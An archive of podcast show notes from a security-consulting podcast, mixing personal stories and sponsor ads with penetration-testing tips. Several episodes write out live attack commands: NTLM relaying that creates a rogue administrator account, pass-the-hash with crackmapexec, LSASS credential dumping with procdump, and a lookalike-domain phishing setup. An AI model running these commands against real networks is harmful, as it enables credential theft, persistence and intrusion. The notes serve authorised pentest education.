How and why payment card data is leaked/stolen/breached - and then sold/monetized
The definition of some fundamental PCI acronym soup, including PCI DSS, PA-DSS and P2PE

7MS #412: Tips for Working Safely and Securely From Home May 01, 2020

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

In today's episode we share some tips for working more safely and securely from home, which for many of us is our new office for the foreseeable future! Specifically, we cover:

Picking powerful passwords
Locking down your wifi
Defending your digital identity
Protecting your PC
Blocking icky stuff in your browser
Composing careful conference calls
Clicking links carefully

I've also made this episode available in long-form blog here. Please feel free to share with anybody you think could benefit from the info!

7MS #411: More Fun Stay-at-Home Security Projects Apr 24, 2020

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

Today is sort of a continuation of episode 407 where we covered four fun stay-at-home security projects including FoldingAtHome building a headless pi-hole, redoing your network with a Dream Machine, and enjoing some music via Zoom by way of Q.U.A.C.K.

In this episode, we cover:

Pentester Academy is awesome and currently has a steal of a deal if you're looking to score a membership on the cheap!
CompTIA caught my eye because they're offering 20% off certain tests/bundles with coupon code earthday2020. Personally I'm this close to pulling the trigger on this CompTIA Cloud+ bundle, and even better, they offer online testing during this stay-at-home time!
Pi-Holes are a free and awesome way to keep ads and other garbage off your network. Additionally, I give you 100 extra nerd points if you enable DNSSSEC. Just make sure your date/time settings on the box is correct, otherwise DNS will be pretty broken. I discuss a fix here on the 7MS forums....

More on today's show notes at 7ms.us!

7MS #400: Tales of Internal Pentest Pwnage - Part 14 Feb 14, 2020

Wow, happy 400th episode everybody! Also, happy SIXTH birthday to the 7MS podcast!

Today I've got a really fun tale of internal network pentest pwnage to share with you, as well as a story about a "poop-petrator." Key moments and takeaways include:

Your target network might have heavy egress filtering in place. I recommend doing full apt-get update and apt-get upgrade and grabbing all the tools you need (may I suggest my script for this?).
If the CrackMapExec --sam flag doesn't work for you, give secretsdump a try, as I ran it on an individual Win workstation and it worked like a champ!
If the latest mimikatz release doesn't rip out passwords for you, try the release from last August. For whatever reason (thanks 0xdf) for the tip!
If your procdumps of lsass appear to be small, endpoint protection might be getting in the way! You might be able to figure out what's running - and stop the service(s) - with CrackMapExec and the -x 'tasklist /v' flag.
If you need to bypass endpoint protection, don't be afraid to go deep into the Google search results. Unfortunately, I think that's all I can say about that, as vendors seem to get snippy about talking about bypasses publicly.

Has 7MS helped you in your IT and security career? Please consider buying me a coffee!

7MS #399: Baby's First Password Cracking Rig Feb 07, 2020

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

Believe it or not I'm pentesting your stuff I never thought I could feel so free-hee-hee I compromised one of your Domain Admins Who it could be? The guy with "Password123"

In today's episode we're talking all about building your own password-cracking rig! "Wait a minute!" you say. "Are you abandoning the Paperspace password cracking in the cloud thing?" Nope! I'm just bringing that methodology "in house" for a little better opsec and also because last year on Paperspace I spent thousands of dollars.

First things first - here's the hardware I ended up with:

Inland Premium 512GB SSD 3D NAND M.2 2280 PCIe NVMe 3.0 x4 Internal Solid State Drive
[Intel Core i5-9400F Desktop Processor 6 Core up to 4.1GHz Without Processor Graphics LGA1151 (Intel 300 Series chipset)](https://www.microcenter.com/product/602028/intel-core-i5-9400f-desktop-processor-6-core-up-to-41ghz-without-processor-graphics-lga1151-(intel-300-series-chipset)
ASUS ROG Strix Z390-H Gaming LGA 1151 ATX Intel Motherboard
EVGA SuperNOVA 1200P2 1200 Watt 80 Plus Platinum Modular Power Supply

For a full shopping list and more notes, head to 7ms.us!

7MS #398: Securing Your Network with Raspberry Pi Sensors Jan 30, 2020

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

I'll be your Raspberry Pi zero baby I don't know what else to say I'll keep bad stuff off of your network I will do it both night and day

Today I talk about four cool Raspberry Pi projects that will help you better secure your network.

First off though, I give a shout out to my son Atticus who I want to be more like because he doesn't give a rat's behind what other people think of him!

The cool Pi-based projects I love are:

Pi-Hole is a black hole for Internet advertisements and it literally installs with just a few commands:

git clone --depth 1 https://github.com/pi-hole/pi-hole.git Pi-hole cd "Pi-hole/automated install/" sudo bash basic-install.sh

Pwnagotchi is a cute little devil who exists only to capture WPA handshakes! I did a whole episode on it, and invite you to build a DYI Pwnagotchi with me live on Feb 10.
How to use a Raspberry Pi as a Network Sensor is a really cool Webinar I watched (brought to us by our pals at BHIS and ActiveCountermeasures) that shows you how to use a Pi with an external drive to install Bro and other tools to help you find bad stuff on your network.
CanaryPi is freaking sweet and can detect NBNS/LLMNR/mDNS spoofing as well as port-scanning, yeah baby! And coming soon (hopefully): mitm6 detection!

Has 7MS helped you in your IT and security career? Please consider buying me a coffee!

7MS #397: OPSEC Tips for Security Consultants Jan 23, 2020

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

I'm working on a new security song called Don't Let the Internet Get You Down, and the chorus will go something like this:

Don't let the Internet get you down It's full of trolls and 10 year olds and adolescent clowns So let their words roll off of you, like water off a duck To prove to them that you don't give a darn

On a more serious note, here are some opsec tips that hopefully will help you as a security consultant:

Good contracts - make sure your SOWs have lots of CYA verbiage to protect you in case something breaks, your assessment schedule needs to be adjusted, etc. Also, consider verbiage that says you'll only retain client testing artifacts (hashes, vuln scans, etc.) for a finite amount of time.
Scope - make sure you talk about scope, both in written and verbal form, often! Also, a Nessus scanning tip: use the nessusd.rules file to not scan any IPs the client doesn't want touched. That way Nessus won't scan those IPs even if you try to force it to!
Send information to/from clients safely - consider forcing MFA on your file-sharing portals, as well as a retention policy so that files "self destruct" after X days.

....and more on today's episode (see 7ms.us for more show notes)!

Has 7MS helped you in your IT and security career? Please consider buying me a coffee!

7MS #396: Tales of Internal Pentest Pwnage - Part 13 Jan 15, 2020

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

In last week's episode I was very close to potentially synching up some very sensitive data with my super secret back door account. In this episode, we resolve the cliffhanger and talk about:

How I don't remember lyrics or titles to songs - even the ones I love - such as My Prerogative. That's why Jack Black is my spirit animal, and he's awesome for singing Elton John songs right to Elton John
If you get DA (relatively) quickly, consider pivoting to a network assessment and crack hashes with secretsdump, test egress filtering, run Network Detective and more
Once you've cracked all the hashes you can, run it through hashcombiner and Pipal like this:

python /opt/hashcombiner/hash_combiner.py user_hash hash_password | sort > combined.txt cut -d ':' -f 2 combined.txt > passwords.txt ruby /opt/pipal/pipal.rb passwords.txt > pip.txt

The procdump + lsass trick is still really effective (though sometimes AV gobbles it)

(See full show notes at 7ms.us!)

7MS #395: Tales of Internal Pentest Pwnage - Part 12 Jan 09, 2020

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

In today's tale of pentest pwnage I got to try some tools and tricks for the first time! Here are the key points/takeaways from this test:

It's great to have additional goals to achieve in a network pentest outside of just "get DA"
PayloadsAllTheThings has a great section on Active Directory attacks
Using mitm6 and ntlmrelayx is now my new favorite thing thanks to The Cyber Mentor's fantastic video showing us exactly how to launch this attack!
If you're scared of running mitm6 and accidentally knocking folks off your network, setup your Kali box to reboot in a few minutes just to be safe. Do something like:

shutdown -r +15 "Rebooting in 15 minutes just in case I mitm6 myself right off this box!"

When mitm6+ntlmrelay dumps out a series of html/json files with lists of users, groups, etc., read through them! Sometimes they can include treats...like user passwords in the comment fields!
Use crackmapexec smb IP.OF.DOMAIN.CONTROLLER -u username -p password to verify if your domain creds are good!

There are a bunch of people I need to thank because their tools/encouragement/advice played a part in making the test successful. See today's show notes on 7ms.us for more info!

7MS #394: DIY Pwnagotchi Jan 03, 2020

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

Sung to the tune of "Do You Wanna Build a Snowman"

Do you wanna build a Pwnagotchi? Even though you thought you never would? I really hope mine doesn't ever break It grabs wifi handshakes It does it really good!

Today's episode is all about Pwnagotchi, a cute little device whose sole purpose in life is to gobble WPA handshakes! Check out today's episode to learn more about the device (as well as some pwn-a-gotchas that you should be aware of), and then come to the next 7MS user group meeting to build your own! If you can't make this meeting I'll also do a Webinar version of the presentation - likely in February or March, so stay tuned to our Webinars page.

At the end of today's episode I talk about my troll foot. I fractured my ankle on Christmas Eve and was basically this lady. At the end of the day I received an avulsion fracture and it kinda made my Christmas stink. But 2020 is gonna absolutely rip, friends!

7MS #393: Interview with Peter Kim Dec 26, 2019

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

Peter Kim of The Hacker Playbook series joins me today to talk about all things hacking! Peter runs a popular west coast hacker meetup, and I was fortunate enough to attend his Real World Red Team training, which I wrote a review about here. Peter sat down with me over Skype to talk about:

The origin story of The Hacker Playbook series (btw please buy it, don't steal it! :-)
How do you balance work and family life when trying to pwn all the things and have a personal life and significant other?
How do you break into security when your background is in something totally different, like a mechanic, artist or musician?
What are some good strategies when approaching a red team engagement - do you always start "fresh" from the perimeter? Do you assume compromise and throw a dropbox on the network? Some combination of both?
What are some other low-hanging fruit organizations can use to better defend their networks?
Do you run across some of these good defenses - like honeypots - in your engagements?
If you could put on a wizard hat and solve one security problem (be it technical, personnel or something else) what would it be?

...and more!

7MS #392: LAPS Reloaded Dec 19, 2019

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute.

Today's episode is all about LAPS - Microsoft's Local Administrator Password solution. In a nutshell, LAPS strengthens and randomizes the local administrator password on the systems across your enterprise. We talked about it way back in episode 252 but figured it was worth a revisit because:

It's awesome
It's free
People still haven't heard of it when I share info about it during conference talks!
I've got a full write-up of how to install LAPS here
At a recent conference people asked me two awesome edge case questions:
- What if I aggressively delete inactive machines from my AD - does the LAPS attribute go with it?
- What do I do if I use Deep Freeze and the LAPS password attribute in AD keeps getting out of sync with the actual password on systems because of Deep Freeze's freeze/thaw times?

7MS #391: Securing Your Family During and After a Disaster - Part 3 Dec 12, 2019

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute.

This is part three of this series - part 1 talked about a fire that destroyed my family's home and vehicles, and part 2 was about how to get "back on the grid" and start working with the insurance machine to find a new "normal."

Today, I want to answer some burning questions many of you have been asking:

Have you hit rock bottom yet? (Spolier alert: no, but I tell you about a moment I almost lost my mind after dropping a shoe in a storm drain)
How long to you get to keep rental cars before you have to replace your permanent vehicles?
Do you have to stay in a hotel the whole time your house is rebuilt?
What about if you get placed in temporary housing - do you have to rebuy your beds/furniture/clothes/etc. and keep them at your temp place, then move them again once your house is rebuilt?
What adjustments might you want to make to your insurance policies to make sure you have the right amount of coverage in case of emergency?

7MS #390: Tales of Internal Network Pentest Pwnage - Part 11 Dec 06, 2019

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute.

Today's episode is a twofer. That's right, two tales of internal network pentest pwnage. Whoop whoop! We cover:

What the SDAD (Single Domain Admin Dance) and DDAD (Double Domain Admin Dance) are (spoiler: imagine your dad trying to dance cool...it's like that, but more awkward)
A good way to quickly find domain controllers in your environment: nslookup -type=SRV _ldap._tcp.dc._msdcs.YOURDOMAIN.SUFFIX
This handy script runs nmap against subnets, then Eyewitness, then emails the results to you
Early in the engagement I'd highly recommend checking for Kerberoastable accounts
I really like Multirelay to help me pass hashes, like:

MultiRelay.py -t 1.2.3.4 -u bob.admin Administrator yourmoms.admin

Once you get a shell, run dump to dump hashes!
Then, use CME to pass that hash around the network!

crackmapexec smb 192.168.0.0/24 -u Administrator -H YOUR-HASH-GOES-HERE --local auth

Then, check out this article to use NPS and get a full-featured shell on your targets

7MS #389: Securing Your Family During and After a Disaster - Part 2 Nov 21, 2019

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

In part 1 of this series we talked about a tragic event my family experienced a few weeks ago: we lost our house and vehicles in a fire. Today I'll talk about:

How to get "back on the grid" when starting with nothing but the clothes on your back. Checklist includes:
- New licenses
- New ATM/credit cards
- Rental vehicles
- Temporary housing
How the most wonderful people in the world come out of your past to lift you up and help you out - and how it may not the people you expect
What's it like working with the insurance machine? What do they help with and not help with?
How much does it suck to lose all your stuff? (Spoiler alert: a lot)
The relief (as weird as that sounds) that comes with losing all your material things

Thanks again for your support via GoFundMe

7MS #388: Securing Your Family During and After a Disaster - Part 1 Nov 15, 2019

In today's episode I talk about how my family's house and two vehicles were recently destroyed in a fire. The Johnson family is all ok - no injuries, thank God. However, this has turned our world upside down, and over the past week of sleepless nights I've thought a lot about how this tragedy could help others ensure their families are safe and secure both during and after a disaster. I imagine this series will go something like this:

Today: Talk about "day zero" - everything that happened on the day of the fire
Part 2: Talk about what it's like working with insurance, 3rd party vendors, getting rental cars, finding temporary housing, and basically getting "back on the grid" starting with NO identification or credit cards
Part 3: Talk about the people part of all this. What are the effects on the family? On the community? On our health? On our faith?

Some folks in the security community were kind enough to setup a GoFundMe if you'd like to support my family during this time.

7MS #387: How to Succeed in Business Without Really Crying - Part 7 Nov 11, 2019

Today's episode features a few important changes to the tools and services I use to run 7MS:

Docusign is out and (sort of) replaced with Proposify
Voltage SecureMail is out and replaced by ShareFile
Ninite is rad for keeping mobile pentest dropboxes automatically updated!
Nessys_SortyMcSortleton has been updated to...you know...work

Additionally, we talk about a few biz-specific challenges:

How do you (comfortably) talk about money with a client before the SOW hits their inbox?
If you're a small security consultancy of 2-5 people, do you lie about your company size to impress the big client, or tell the truth and brag about the advantages a nimble team can bring?

7MS #386: Interview with Ryan Manship and Dave Dobrotka - Part 4 Nov 01, 2019

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

I'm sorry it took me forever and a day to get this episode up, but I'm thrilled to share part 4 (the final chapter - for now anyways) of my interview with the red team guys, Ryan and Dave!

In today's episode we talk about:

Running into angry system admins (that are either too fired up or not fired up enough)
Being wrong without being ashamed
When is it necessary to make too much noice to get caught during an engagement?
What are the top 5 tools you run on every engagement?
How do you deal with monthly test reports indefinitely being a copy/paste of the previous month's report?
How do you deal with clients who scope things in such as way that the test is almost impossible to conduct?
How do you deal with colleagues who take findings as their own when they talk with management?
How do you work with clients who don't know why they want a test - except to check some sort of compliance checkmark?
What is a typical average time to complete a pentest on a vendor (as part of a third-party vendor assessment)?
How could a fresh grad get into a red team job?
What do recruiters look for candidates seeking red team positions?
If a red team is able to dump a whole database of hashes or bundle of local machine hashes, should they crack them?
What do you do when you're contracted for a pentest, but on day one your realize the org is not at all ready for one?
What's your favorite red team horror story?

7MS #385: A Peek into the 7MS Mail Bag Oct 22, 2019

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute.

Today I'm joined by a very special guest: Mrs. 7MS! She joins me on a road trip to northern MN, reads me some questions from the 7MS mail bag, and we tackle them together (with a side order of commentary on weddings, overheating iPads, cheap hotels and the realization that this is likely the first - and only episode that Mrs. 7MS has ever listened to).

Links to things discussed this episode:

Wireless pentest certs:

SEC617 - SANS course that covers wifi pentesting (with WPA enterprise attacks)
Offensive Security Wireless Professional

Good/free pentest training options:

Free logging/alerting solutions for SMBs:

7MS #384: Creating Kick-Butt Credential-Capturing Phishing Campaigns Oct 12, 2019

In this episode I talk about some things I learned about making your own kick-butt cred-capturing phishing campaign and how to do so on the (relatively) quick and (relatively) cheap! These tips include:

Consider this list of top 9 phishing simulators.
Check out GoPhish!
Then spin up a free tier Kali AWS box
Follow the instructions to install GoPhish and get it running on your AWS box
Use the Expired Domains site to buy up a domain that is similar to your victim - maybe just one character off - but has been around a while and has a good reputation
Add a G Suite or O365 email account (or whatever email service you prefer) to the new domain
Create a convincing cred-capturing portal on GoPhish - I used some absolutely disguisting and embarassing HTML like this (see show notes on 7ms.us):
Use this awesome article to secure your fancy landing page with a LetsEncrypt cert!
Have fun!!!

7MS #383: Tales of Internal Network Pentest Pwnage - Part 10 Oct 01, 2019

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

This episode is a "sequel" of sorts to part 9 where I was helping another company tag-team an internal network pentest. (In announcer voice) "When we last left our heroes we had..."

Relayed one high-priv cred from one box to another
Dumped and cracked a local machine's hash
Passed that hash around the network
Found (via Bloodhound) some high value targets we wanted to grab domain admin creds from
Set the wdigest flag via CrackMapExec

Today, we talk about how we came back to the pentest a few days later and scripted the procdump/lsass operation to (hopefully) grab cleartext credentials from these high value targets. Here's how we did it:

mkdir /share wget https://live.sysinternals.com/procdump64.exe screen -R smb /opt/impacket/examples/smbserver.py -smb2support share /share

Then, we ran the following CME commands to copy procdump over to the victim machine, create the dump, take the dump, then delete procdump.exe:

crackmapexec smb 192.168.55.220 -u Administrator -p 'Winter2018!' --local-auth --exec-method smbexec -x 'copy "\\192.168.55.60\share\procdump64.exe" "c:\users\public\procdump64.exe"' (more on today's episode show notes)

7MS #382: Tales of Internal Network Pentest Pwnage - Part 9 Sep 24, 2019

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute.

Today's episode is about a pentest that was pretty unique for me. I got to ride shotgun and kind of be in the shadows while helping another team pwn a network.

This was an especially interesting one because the client had a lot of great security defenses in place, including:

Strong user passwords
A SIEM solution that appeared to be doing a great job

We did some looking for pwnage opportunities such as:

Systems missing EternalBlue patch
Systems missing BlueKeep patch

What got us a foot in the door was the lack of SMB signing. Check this gist to see how you can use RunFinger.py to find hosts without SMB signing, then use Impacket and Responder to listen for - and pass - high-priv hashes.

Side note: I'm working on getting a practical pentesting gist together in the vein of Penetration Testing: A Hands-On Introduction to Hacking and Hacker Playbook.

7MS #381: DIY $500 Pentesting Lab Deployment Tips Sep 18, 2019

For Windows VMs

Take a snapshot right after the OS is installed, as (I believe) the countdown timer for Windows evaluation mode starts upon first "real" boot.
Want to quickly run Windows updates on a fresh Win VM? Try this (here's the source):

powershell Install-PackageProvider -Name NuGet -Force powershell Install-Module PSWindowsUpdate -force powershell Set-ExecutionPolicy bypass powershell Import-Module PSWindowsUpdate powershell Get-WindowsUpdate powershell Install-WindowsUpdates -AcceptAll -AutoReboot

To turn on remote desktop:

Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0

To set the firewall to allow RDP:

Enable-NetFirewallRule -DisplayGroup "Remote Desktop"

To stop the freakin' Windows hosts from going to sleep:

powercfg.exe -change -standby-timeout-ac 0

To automate the install of VMWare tools, grab the package from VMWare's site, decompress it, then:

setup64.exe /s /v "/qn reboot=r"

To set the time zone via command line, run tzutil /l and then you can set your desired zone with something like tzutil /s "Central Standard Time"

For Linux VMs

Get SSH keys regenerated and install/run openssh server:

apt install openssh-server -y mkdir /etc/ssh/default_keys mv /etc/ssh/ssh_host_* /etc/ssh/default_keys/ dpkg-reconfigure openssh-server systemctl enable ssh.service systemctl start ssh.service

Then grab some essential pentesting tools using Kali essentials, and keep 'em updated git update

Next user group meeting September 30!

7MS #380: Tales of Internal Network Pentest Pwnage - Part 8 Sep 05, 2019

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute.

Today's episode is a continuation of episode #379, where we:

Conducted general nmap scans (and additional scans specifically looking for Eternal Blue)
Sucked our nmap scans into Eyewitness
Captured and cracked some creds with Paperspace
Scraped the company's marketing Web site with brutescrape and popped a domain admin account (or so I thought!)

Today, the adventure continues with:

Checking the environment for CVE-2019-1040
Picking apart the privileges on my "pseudo domain admin" account
Making a startling discovery about how almost all corp passwords were stored

Enjoy!

7MS #379: Tales of Internal Network Pentest Pwnage - Part 7 Aug 30, 2019

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

This episode, besides talking about a man who screamed at me for not being on my cell phone, covers another tale of internal network pentest pwnage! Topics/tactics covered include:

Review of setting up your DIY pentest dropbox
Choosing the right hardware (I'm partial to this NUC)
Running Responder to catch creds
Using Eyewitness to snag screenshots of stuff discovered with nmap scanning
Nmap for Eternal Blue with nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17-010 192.168.0.0/24
Running Sharphound to get a map of the AD environment
Cracking creds with Paperspace
When cracking, make sure to scrape the customer's public Web sites for more wordlist ideas!

7MS #378: Interview with Zane West of Proficio Aug 22, 2019

In today's episode, I sit down with Zane West of Proficio. Zane has been in information security for more than 20 years - starting out in the "early days" as a sysadmin and then moved up into global infrastructure architect function in the banking world. Today Zane manages Proficio's solution and product development. I sat down with Zane over Skype to talk about how companies can better analyze and defend their networks against attacks. Specifically, we talk about:

How important is it to have an IT background before you jump into security?
How can newb(ish) security analysts and pentesters better understand the political/financial struggles a business has, rather than charge in and scream "PWN ALL THE THINGS!"
Is there a "right way" to step into an organization, get a lay of the land and discover/prioritize their security risks?
Why in the world does it take twenty seven people to run a SOC?!
When should an organization consider engaging an MSSP to help them with their security needs?
What if your MSP also provides MSSP services? Is that a good or bad thing?
What are some tips for successfully deploying a SIEM?
What is the cyber kill chain about, and is it only something for the Fortune X companies, or can smaller orgs tip their toe in it as well? (Here's a nice graph to help you understand it)

7MS #377: DIY Pentest Dropbox Tips Aug 16, 2019

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute.

In today's episode I cover some of the nasty "gotchas" I've run into when sending my pentest dropboxes around the country. Curious on how to setup your own portable pentest dropboxes (and/or pentest lab environments)? Check out part 1 and part 2 of the DIY Pentest Lab video series.

Here are some of the pain points I cover today:

Turn the firewall off Set Computer Configuration > Policies > Administrative Templates > Network > Network Connections > Windows Firewall > Domain Profile > Windows Firewall: Protect all network connections to Disabled. Do the same for the Standard Profile by changing Computer Configuration > Policies > Administrative Templates > Network > Network Connections > Windows Firewall > Standard Profile > Windows Firewall: Protect all network connections to Disabled.
Disable Windows Defender Navigate to Computer Configuration > Administrative Templates > Windows Components > Windows Defender and choose Turn Off Windows Defender.
Disable power sleep settings To stop computers from snoozing on the job, head to Computer Configuration > Policies > Administrative Templates > System > Power Management > Sleep Settings and set Allow standby states (S1-S3) when sleeping (plugged in) to Disabled
Create a second disk on the Windows management VM and install BitLocker to Go

Check out today's show notes at 7ms.us for more info!

7MS #376: Tales of SQL Injection Pwnage Aug 12, 2019

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute.

We cover a lot of ground today on a variety of topics:

I have an Oculus Quest now and I love it. My handle is turdsquirt if you ever wanna shoot some zombies together.
I share a story that yes, does involve poop - but only the mention of it. It's nothing like the epic tale (tail?) of my parents' dog pooping in my son's dresser drawers.
I had a really fun pentest recently where I found some good old school SQL injection. I took to Slack to share and since then, several of you have reached out to ask how I found the vulnerability. Here are some steps/tips I talk about on today's episode that will help:
- Watch Sunny's Burp courses on Pluralsight to enhance your Burp abilities
- Install CO2 from the BApp store
- When doing a Web app pentest, feed various fields SQL injection payloads, such as the ones in PayloadsAlltheThings
- Grab a copy of sqlmap
- Use sites like this one to help tune your sqlmap commands to find vulnerabilities. In the end, my command I used to dump contents of important tables was this:

(See today's show notes on the 7MS Web site for more information!)

7MS #375: Tales of Pentest Fail #3 Aug 02, 2019

I swear this program isn't turning into the Dr. Phil show, but I have to say that sharing tales of fail is extremely therapeutic for me, and based on your comments, it sounds like many of you feel the same way too.

Today's takeaways include:

Doing a 8-10 hour internal pentest is probably overly ambitious. Seriously, it's really NOT a lot of time.
If a client uses a logging/alerting system, vulnerability scanning is very loud to their digital ears
Checking for DNS zone transfers is a good idea!

7MS #374: Tales of Internal Pentest Pwnage - Part 6 Jul 24, 2019

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

Ok, I lied a few episodes ago, and I'm sorry! I was on an epic road trip this week and suddenly remembered the pentest that really had the shortest TTDA (time to domain admin) ever. Enjoy that tale on today's podcast! Oh, and I also reference this gist which might help you test your SIEM bells and whistles.

Psssst - I'm sorry (but not sorry) but this episode begins with a long story about a dog pooping inside a dresser drawer. If you'd rather skip that, the actual episode begins at about 29:00)

7MS #373: Tales of Pentest Fail #2 Jul 19, 2019

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

Today's episode is a two-tale story of me failing fantastically at vulnerability scanning early in my security career. Enjoy. Because I didn't at the time. :-)

7MS #372: Tales of Internal Pentest Pwnage - Part 5 Jul 15, 2019

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://pro.tv/7minute

Today I share the (hopefully) exciting and fun conclusion to last week's episode about a tale of internal pentest pwnage! A few important notes from today's episode:

Need to find which hosts on your network have SMB signing disabled, and then get a nice clean list of IPs as a result? Try this:

opt/responder/tools/RunFinger.py -i THE.SUBNET.YOU-ARE.ATTACKING/24 -g > hosts.txt grep "Signing:'False'" hosts.txt | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' > targets.txt

Source: Pwning internal networks automagically

Ready to pass captured hashes from one host to another? Open responder.conf and turn SMB and HTTP to Off, then get Responder running in one window, and ntlmrelayx in another. Specifically, I like to use ntlmrelayx.py -tf targets.txt where targets.txt is the list of machines you found that are not using SMB signing. I also like to add a -c to run a string of my choice. Check out this fun evil little nugget:

net user /add ladmin1 s00p3rn4ughtyguy! /Y & net localgroup Administrators ladmin1 /add & net localgroup "Remote Desktop Users" ladmin1 /add

So the full command would be:

ntlmrelayx.py -tf targets.txt -c 'net user /add ladmin1 s00p3rn4ughtyguy! /Y & net localgroup Administrators ladmin1 /add & net localgroup "Remote Desktop Users" ladmin1 /add'

Check today's show notes at https://7ms.us for more information!

7MS #371: Tales of Internal Pentest Pwnage - Part 4 Jul 12, 2019

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://pro.tv/7minute

Happy belated 4th of July! Today I've got another fun tale of internal pentest pwnage that comes out of a few recent assessments I did. These tests were really fun because the clients had good defensive measures in place, such as:

Having separate accounts for day-to-day operations and administrative/privileged tasks
Local Administrator account largely disabled across the enterprise
Lean membership in privileged groups (Domain Admins, Enterprise Admins, Schema Admins, etc.)
Hard-to-crack passwords!

Will I succeed in getting a solid foothold on this network and (hopefully) escalate to Domain Admin? Check out today's episode to find out!

7MS #370: Happy Secure 4th! Jul 03, 2019

Hey folks, happy secure 4th o' July!

In today's seven minute episode (Wha? Gasp! Yep...it's seven minutes!) I kick back a bit, give you some updates and tease/prepare you for some cool full episodes to come in the near future. Topics covered include:

NPK, which I talked about last week is super awesome but I'm having issues getting my jobs to run clean. Will keep you posted on progress!
Tales of internal pentest pwnage - wow, folks have been sending me feedback that they really like this series. I've got a good episode coming up for you on that front, just can't share right now as the project is just wrapping up.
Songwriting - I enjoy writing songs about people to the tune of the old Spiderman theme song. If they ever do a show like The Voice but they're looking for people to write songs about other people based on the Spiderman theme song, I think I've got a shot.

7MS #369: Cracking Hashes with NPK Jun 28, 2019

Today's episode is brought to you by my friends at safepass.me. Safepass.me is the most efficient and cost-effective solution to prevent Active Directory users from setting a weak or compromised password. It's in compliance with the latest NIST password guidelines, and is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

Today I'm having a blast with cracking hashes quickly and cost-effectively using NPK.

For 1+ years I've loved my Paperspace config, but lately I've had some reservations about it:

People are telling me they're having problems installing the drivers
My methodology for building wordlists with HateCrack doesn't seem to work anymore
